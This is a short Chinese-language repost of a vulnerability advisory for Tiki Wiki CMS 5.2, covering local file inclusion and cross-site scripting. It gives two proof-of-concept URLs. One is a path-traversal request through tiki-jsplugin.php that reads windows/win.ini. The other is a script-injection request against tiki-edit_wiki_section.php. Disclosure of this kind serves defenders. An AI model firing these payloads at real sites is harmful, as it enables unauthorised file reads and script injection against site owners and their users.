漏洞标题:
ki Wiki CMS 本地文件包含和跨站脚本漏洞
ki Wiki CMS 本地文件包含以及跨站脚本漏洞
漏洞描述:
攻击者可以通过浏览器利用这些问题。利用一个跨站点脚本问题,攻击者必须诱使不知情的用户点击一个恶意的URI。
已发布到官网:
http://www.securityfocus.com/bid/43507
secureshell-h [email protected] 回信:
本地文件漏洞EXP:
http://127.0.0.1/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini
跨站脚本漏洞演示:
http://127.0.0.1/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
文章来源于lcx.cc:【漏洞】ki Wiki CMS本地文件包含及跨站脚本
文章来源于lcx.cc:看看IT强人如何求婚!相关推荐: 今天遇到一个微信公众平台注入的实例之前有过讨论(大家有考虑过微信公众平台的注入么),但是情况是我自己模拟出来的,今天终于遇到一个实例。 话不多说,上图。 附送盲打到的后台 [原文地址] 相关讨论: 1#…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论